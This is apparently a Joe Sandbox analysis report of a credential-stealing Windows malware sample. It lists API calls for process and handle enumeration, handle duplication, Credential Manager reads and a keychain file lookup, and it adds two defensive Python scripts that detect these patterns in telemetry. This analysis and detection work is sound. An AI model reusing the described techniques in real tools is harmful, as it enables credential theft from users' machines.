39007->39021 39009 405332 39009->38966 39011 40b58d 27 API calls 39010->39011 39012 40b18c 39011->39012 39012->38973 39013->38977 39014->38981 39015->38985 39016->38989 39017->38993 39018->38997 39019->39001 39020->39005 39021->39009 39023 405220 39 API calls 39022->39023 39024 405369 39023->39024 39024->38850 39024->38851 39025->38853 39026->38857 39027->38854 39028->38851 39030 40440c FreeLibrary 39029->39030 39031 40436d 39030->39031 39032 40a804 8 API calls 39031->39032 39033 404377 39032->39033 39034 404383 39033->39034 39035 404405 39033->39035 39036 40b273 27 API calls 39034->39036 39035->38424 39035->38426 39035->38427 39037 40438d GetProcAddress 39036->39037 39038 40b273 27 API 
calls 39037->39038 39039 4043a7 GetProcAddress 39038->39039 39040 40b273 27 API calls 39039->39040 39041 4043ba GetProcAddress 39040->39041 39042 40b273 27 API calls 39041->39042 39043 4043ce GetProcAddress 39042->39043 39044 40b273 27 API calls 39043->39044 39045 4043e2 GetProcAddress 39044->39045 39046 4043f1 39045->39046 39047 4043f7 39046->39047 39048 40440c FreeLibrary 39046->39048 39047->39035 39048->39035 39050 404413 FreeLibrary 39049->39050 39051 40441e 39049->39051 39050->39051 39051->38441 39052->38437 39054 40442e 39053->39054 39056 40447e 39053->39056 39055 40b2cc 27 API calls 39054->39055 39057 404438 39055->39057 39056->38437 39058 40a804 8 API calls 39057->39058 39059 40443e 39058->39059 39060 404445 39059->39060 39061 404467 39059->39061 39062 40b273 27 API calls 39060->39062 39061->39056 39064 404475 FreeLibrary 39061->39064 39063 40444f GetProcAddress 39062->39063 39063->39061 39065 404460 39063->39065 39064->39056 39065->39061 39067 4135f6 39066->39067 39068 4135eb FreeLibrary 39066->39068 39067->38444 39068->39067 39070 4449c4 39069->39070 39071 444a52 39069->39071 39072 40b2cc 27 API calls 39070->39072 39071->38461 39071->38466 39073 4449cb 39072->39073 39074 40a804 8 API calls 39073->39074 39075 4449d1 39074->39075 39076 40b273 27 API calls 39075->39076 39077 4449dc GetProcAddress 39076->39077 39078 40b273 27 API calls 39077->39078 39079 4449f3 GetProcAddress 39078->39079 39080 40b273 27 API calls 39079->39080 39081 444a04 GetProcAddress 39080->39081 39082 40b273 27 API calls 39081->39082 39083 444a15 GetProcAddress 39082->39083 39084 40b273 27 API calls 39083->39084 39085 444a26 GetProcAddress 39084->39085 39086 40b273 27 API calls 39085->39086 39087 444a37 GetProcAddress 39086->39087 39088 40b273 27 API calls 39087->39088 39089 444a48 GetProcAddress 39088->39089 39089->39071 39090->38472 39091->38472 39092->38472 39093->38472 39094->38462 39096 403a29 39095->39096 39110 403bed memset memset 39096->39110 39098 403ae7 39123 40b1ab ??3@YAXPAX 
??3@YAXPAX 39098->39123 39099 403a3f memset 39104 403a2f 39099->39104 39101 403aef 39101->38481 39102 409d1f 6 API calls 39102->39104 39103 409b98 GetFileAttributesW 39103->39104 39104->39098 39104->39099 39104->39102 39104->39103 39105 40a8d0 7 API calls 39104->39105 39105->39104 39107 40a051 GetFileTime FindCloseChangeNotification 39106->39107 39108 4039ca CompareFileTime 39106->39108 39107->39108 39108->38481 39109->38478 39111 414c2e 16 API calls 39110->39111 39112 403c38 39111->39112 39113 409719 2 API calls 39112->39113 39114 403c3f wcscat 39113->39114 39115 414c2e 16 API calls 39114->39115 39116 403c61 39115->39116 39117 409719 2 API calls 39116->39117 39118 403c68 wcscat 39117->39118 39124 403af5 39118->39124 39121 403af5 20 API calls 39122 403c95 39121->39122 39122->39104 39123->39101 39125 403b02 39124->39125 39126 40ae18 9 API calls 39125->39126 39128 403b37 39126->39128 39127 40ae51 9 API calls 39127->39128 39128->39127 39129 403bdb 39128->39129 39130 40add4 wcscmp wcscmp 39128->39130 39133 40ae18 9 API calls 39128->39133 39134 40aebe FindClose 39128->39134 39135 40a8d0 7 API calls 39128->39135 39131 40aebe FindClose 39129->39131 39130->39128 39132 403be6 39131->39132 39132->39121 39133->39128 39134->39128 39135->39128 39137 409d1f 6 API calls 39136->39137 39138 404190 39137->39138 39151 409b98 GetFileAttributesW 39138->39151 39140 40419c 39141 4041a7 6 API calls 39140->39141 39142 40435c 39140->39142 39144 40424f 39141->39144 39142->38506 39144->39142 39145 40425e memset 39144->39145 39147 409d1f 6 API calls 39144->39147 39148 40a8ab 9 API calls 39144->39148 39152 414842 39144->39152 39145->39144 39146 404296 wcscpy 39145->39146 39146->39144 39147->39144 39149 4042b6 memset memset _snwprintf wcscpy 39148->39149 39149->39144 39150->38504 39151->39140 39155 41443e 39152->39155 39154 414866 39154->39144 39156 41444b 39155->39156 39157 414451 39156->39157 39158 4144a3 GetPrivateProfileStringW 39156->39158 39159 414491 39157->39159 39160 414455 wcschr 

Control-flow Graph

• Executed
• Not Executed
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                               control_flow_graph 413d4c (rendered graph; edge list not reproduced). Entry block 413d4c-413da0: call 40b633, CreateToolhelp32Snapshot, memset, Process32FirstW. Loop head 413f00-413f11: Process32NextW; exit block 413f17-413f24: FindCloseChangeNotification. Per-process path 413da5-413ded: OpenProcess; 413e37-413e44: GetModuleHandleW; 413e46-413e5c: GetProcAddress; 413ea2-413eae: CloseHandle; 413ebf-413ec6: ??3@YAXPAX@Z.
                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                              • API String ID: 2191996607-1740548384
                                                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
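The two OpenProcess access masks in the listings above are the detection-relevant detail. The function at 0040DE15 calls NtQuerySystemInformation with class 0x10 (SystemHandleInformation), opens the matching process with 0x40 (PROCESS_DUP_HANDLE) and calls DuplicateHandle, after comparing process names against dllhost.exe, taskhost.exe and taskhostex.exe. The function at 00413D6A walks a TH32CS_SNAPPROCESS (0x2) snapshot and opens every process with 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ) before resolving QueryFullProcessImageNameW through GetProcAddress. The Python below is an added example, not part of the Joe Sandbox report or of the Remcos sample: it runs both patterns as detection logic over constructed ProcessAccess records carrying the Sysmon Event ID 10 fields the check needs. The allowlist, the sweep threshold of five targets, the process IDs and the wab.exe path are assumptions.

```python
"""Flag ProcessAccess telemetry matching the two OpenProcess patterns in the
report above: PROCESS_DUP_HANDLE (0x40) against dllhost/taskhost/taskhostex,
and a sweep of many processes with PROCESS_QUERY_INFORMATION|PROCESS_VM_READ
(0x410). Sample records are constructed, not captured Sysmon output."""
from collections import defaultdict

PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040                                # OpenProcess(0x40) at 0040DEEC
PROCESS_QUERY_INFORMATION = 0x0400
SWEEP_MASK = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ  # OpenProcess(0x410) at 00413DE0

# Process names the handle-duplicating function compares against (strings at 0040DEB2..0040DED8).
HANDLE_TARGETS = {"dllhost.exe", "taskhost.exe", "taskhostex.exe"}
# Assumption: system processes that legitimately duplicate handles; tune per estate.
DUP_HANDLE_ALLOWLIST = {"csrss.exe", "lsass.exe", "services.exe"}
# Assumption: distinct targets one process may open with 0x410 before it counts as a sweep.
SWEEP_THRESHOLD = 5


def basename(image_path):
    """Lower-cased file name of a Windows image path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' record carrying the Sysmon
    EID 10 fields SourceImage, SourceProcessId, TargetImage and GrantedAccess."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    return {
        "source": basename(fields["SourceImage"]),
        "source_pid": int(fields["SourceProcessId"]),
        "target": basename(fields["TargetImage"]),
        "access": int(fields["GrantedAccess"], 16),
    }


def detect(lines):
    """Return ('dup_handle', source, pid, target) for each PROCESS_DUP_HANDLE open of a
    listed host by a non-allowlisted source, and ('process_sweep', source, pid, n_targets)
    for each source that opened >= SWEEP_THRESHOLD distinct targets with 0x410 access."""
    alerts = []
    sweeps = defaultdict(set)  # (source, pid) -> targets opened with at least 0x410
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        ev = parse_event(line)
        if (ev["access"] & PROCESS_DUP_HANDLE
                and ev["target"] in HANDLE_TARGETS
                and ev["source"] not in DUP_HANDLE_ALLOWLIST):
            alerts.append(("dup_handle", ev["source"], ev["source_pid"], ev["target"]))
        if (ev["access"] & SWEEP_MASK) == SWEEP_MASK:
            sweeps[(ev["source"], ev["source_pid"])].add(ev["target"])
    for (source, pid), targets in sweeps.items():
        if len(targets) >= SWEEP_THRESHOLD:
            alerts.append(("process_sweep", source, pid, len(targets)))
    return alerts


# Constructed sample: wab.exe (the injected host in this report) opens dllhost.exe with
# 0x40 and sweeps six processes with 0x410; csrss.exe and svchost.exe are benign noise.
SAMPLE_EVENTS = r"""
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\dllhost.exe|GrantedAccess=0x40
SourceImage=C:\Windows\System32\csrss.exe|SourceProcessId=612|TargetImage=C:\Windows\System32\taskhost.exe|GrantedAccess=0x40
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\explorer.exe|GrantedAccess=0x410
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\svchost.exe|GrantedAccess=0x410
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x410
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\winlogon.exe|GrantedAccess=0x410
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\dllhost.exe|GrantedAccess=0x410
SourceImage=C:\Program Files\Windows Mail\wab.exe|SourceProcessId=4144|TargetImage=C:\Windows\System32\taskhostw.exe|GrantedAccess=0x410
SourceImage=C:\Windows\System32\svchost.exe|SourceProcessId=900|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x410
SourceImage=C:\Windows\explorer.exe|SourceProcessId=3320|TargetImage=C:\Windows\System32\notepad.exe|GrantedAccess=0x1000
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Against real telemetry the records come from Sysmon Event ID 10 (ProcessAccess), where GrantedAccess is already a hex string; the sweep rule tests for 0x410 as a subset of the granted mask rather than an exact match, so a request that adds further rights is still counted.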

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                              • memcpy.MSVCRT ref: 0040B60D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                              • String ID: BIN
                                                                                              • API String ID: 1668488027-1015027815
                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1690352074-0
                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3558857096-0
                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                               control_flow_graph 44553b (rendered graph; edge list not reproduced). Entry block 44553b-445558: call 44db70. 44555a-44557c: call 40c768, call 40bdb0, call 4135f7. 4455a8-4455e3: memset, call 403988, wcsrchr. 4456ca-4456d3: call 413cfa, call 413d4c. 4456fd-445796: memset * 4, call 409c70 * 3. 445d3d-445d65: call 409c52, call 40b2cc, _wcsicmp. Repeated blocks at 4458bb, 44595e, 445a00, 445ab2, 445b38, 445c8b, 445d88 and 445e83: memset followed by calls among 414c2e, 40b2cc, 409d1f, 409b98, 40ae18 and 445389.
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                              • memset.MSVCRT ref: 00445755
                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                              • API String ID: 2745753283-3798722523
                                                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
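The listings in this section share one shape: a record per function, each call written as Api.MODULE(args), ref: address, with calls made from subroutines marked as subcalls. Parsing that shape is enough to tag what a function does without opening the binary: the record at 0040DE15 (NtQuerySystemInformation class 0x10 = SystemHandleInformation, OpenProcess with 0x40 = PROCESS_DUP_HANDLE, DuplicateHandle), the record at 00413D6A (Toolhelp32 process walk plus run-time resolution of QueryFullProcessImageNameW), the record at 0040B5B6 (FindResourceW, LoadResource, LockResource on the resource type BIN) and the CredEnumerateW subcall at 0040BDE9 in the record above. The Python below is an added example, not part of the Joe Sandbox report or of the sample: its input is a copy of lines from the records in this section; the tag names, the constant names, and the choice to split records at the APIs header are its own.

```python
"""Parse the per-function API listings of a Joe Sandbox report into call
sequences and tag the behaviours they imply. SAMPLE_REPORT is copied from the
records above; the tag rules and constant names are this example's own."""
import re

SYSTEM_HANDLE_INFORMATION = 0x10   # NtQuerySystemInformation class seen at 0040DE15
PROCESS_DUP_HANDLE = 0x40          # OpenProcess access seen at 0040DEEC
TH32CS_SNAPPROCESS = 0x2           # CreateToolhelp32Snapshot flag seen at 00413D6A

# '• Api.MODULE(args), ref: ADDR', optionally prefixed with 'Part of subcall function X:'.
CALL_RE = re.compile(
    r"•?\s*(?P<sub>Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


def _arg(token):
    """Eight hex digits become ints; strings and '?' (value unknown) stay as text."""
    token = token.strip()
    return int(token, 16) if re.fullmatch(r"[0-9A-F]{8}", token) else token


def parse_calls(text):
    """One record per 'APIs' header; each call keeps api, module, args, ref and a subcall flag."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = [_arg(a) for a in m.group("args").split(",")] if m.group("args") else []
            current.append({"api": m.group("api"), "module": m.group("module"), "args": args,
                            "ref": m.group("ref"), "subcall": m.group("sub") is not None})
    return records


def tag_record(calls):
    """Derive behaviour tags from the APIs present and the constants passed to them."""
    apis = {c["api"] for c in calls}

    def first_args(name):
        return [c["args"][0] for c in calls if c["api"] == name and c["args"]]

    tags = []
    if apis & {"Process32FirstW", "Process32NextW"} and any(
            isinstance(a, int) and a & TH32CS_SNAPPROCESS for a in first_args("CreateToolhelp32Snapshot")):
        tags.append("process-enumeration (Toolhelp32)")
    if SYSTEM_HANDLE_INFORMATION in first_args("NtQuerySystemInformation"):
        tags.append("handle-enumeration (SystemHandleInformation)")
    if "DuplicateHandle" in apis and any(
            isinstance(a, int) and a & PROCESS_DUP_HANDLE for a in first_args("OpenProcess")):
        tags.append("handle-duplication (PROCESS_DUP_HANDLE)")
    if {"FindResourceW", "LoadResource", "LockResource"} <= apis:
        tags.append("embedded-resource-load")
    if "CredEnumerateW" in apis:
        tags.append("credential-access (Credential Manager)")
    # Names handed to GetProcAddress are the imports the function resolves at run time.
    resolved = [a for c in calls if c["api"] == "GetProcAddress"
                for a in c["args"] if isinstance(a, str) and a != "?"]
    entry = next((c["ref"] for c in calls if not c["subcall"]), None)
    return {"entry": entry, "apis": [c["api"] for c in calls], "tags": tags, "resolved": resolved}


def analyze(text):
    return [tag_record(calls) for calls in parse_calls(text) if calls]


# Copied from the records above (three functions; the first includes one subcall line).
SAMPLE_REPORT = """
APIs
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• _wcsicmp.MSVCRT ref: 0040DEB2
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
APIs
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
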